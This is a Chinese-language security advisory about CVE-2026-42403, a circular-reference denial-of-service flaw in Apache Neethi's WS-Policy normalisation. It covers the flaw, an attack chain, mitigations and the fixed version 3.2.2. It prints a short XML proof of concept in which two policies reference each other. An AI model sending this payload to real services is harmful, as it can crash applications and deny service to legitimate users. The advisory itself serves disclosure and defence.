CVE-2026-42403 CVSS 7.5 高危

CVE-2026-42403 Apache Neethi 循环引用拒绝服务漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42403

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Neethi

漏洞概述

Apache Neethi 在处理 WS-Policy 文档时，未能正确检测策略定义中的循环引用。当攻击者提交包含循环引用的恶意策略文档时，策略规范化过程可能进入无限循环或过度递归，导致堆栈溢出或应用程序挂起，从而引发拒绝服务。建议用户尽快升级至 3.2.2 版本以修复此漏洞。

技术细节

该漏洞的核心在于 Apache Neethi 库在进行 WS-Policy 规范化处理时，缺乏对循环依赖的有效检测机制。WS-Policy 允许通过 PolicyReference 元素引用其他策略。若策略 A 引用策略 B，而策略 B 又反向引用策略 A，即形成闭环。当 Neethi 尝试解析并合并此类结构时，其递归算法无法识别终止条件，导致持续递归调用。这不仅会大量消耗 CPU 资源，最终还会因调用栈层级过深触发 StackOverflowError，导致处理进程崩溃或服务不可响应。由于该漏洞无需用户交互即可通过网络触发，具有较高的利用风险。

攻击链分析

STEP 1

侦察与探测

攻击者识别目标系统是否使用了 Apache Neethi 库来处理 Web 服务策略。

STEP 2

构造恶意文档

攻击者编写一个包含循环引用（Policy A -> Policy B -> Policy A）的恶意 WS-Policy XML 文件。

STEP 3

发送攻击载荷

攻击者通过网络向目标端点发送包含恶意策略的请求，无需身份认证。

STEP 4

触发漏洞

目标系统的 Neethi 库解析策略时陷入无限递归，导致栈溢出或系统挂起。

STEP 5

达成影响

目标应用程序崩溃或资源耗尽，无法为合法用户提供服务，达成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-42403: Circular Reference in WS-Policy -->
<!-- This XML document creates a circular reference between PolicyA and PolicyB -->
<wsp:Policy xmlns:wsp="http://schemas.xmlsoap.org/ws/2004/09/policy" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" wsu:Id="PolicyA">
  <wsp:ExactlyOne>
    <wsp:All>
      <wsp:PolicyReference URI="#PolicyB"/>
    </wsp:All>
  </wsp:ExactlyOne>
</wsp:Policy>

<wsp:Policy xmlns:wsp="http://schemas.xmlsoap.org/ws/2004/09/policy" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" wsu:Id="PolicyB">
  <wsp:ExactlyOne>
    <wsp:All>
      <wsp:PolicyReference URI="#PolicyA"/>
    </wsp:All>
  </wsp:ExactlyOne>
</wsp:Policy>

影响范围

Apache Neethi < 3.2.2

防御指南

临时缓解措施

如果无法立即升级，建议在应用网关或解析器前置过滤器中，对传入的 XML 策略文档进行深度检查，拒绝包含复杂嵌套或循环引用的文档。同时，可以为解析过程设置严格的超时时间和线程池隔离，防止单个恶意请求耗尽服务器资源。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表